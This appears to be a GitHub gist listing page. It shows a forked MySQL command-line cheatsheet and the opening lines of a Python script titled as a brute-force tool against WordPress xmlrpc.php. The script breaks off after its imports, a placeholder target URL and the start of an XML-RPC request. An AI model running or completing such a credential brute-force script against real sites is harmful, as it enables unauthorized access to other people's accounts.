Skip to content

Instantly share code, notes, and snippets.

@fuuddanni
fuuddanni / README.md
Created July 2, 2018 01:20 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet
@fuuddanni
fuuddanni / brutewp.py
Created July 30, 2016 17:14
Bruteforce Wordpress xmlrpc.php
import itertools
import requests
TARGET_URL = 'http://yourhosthere/xmlrpc.php'
XML = '''
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>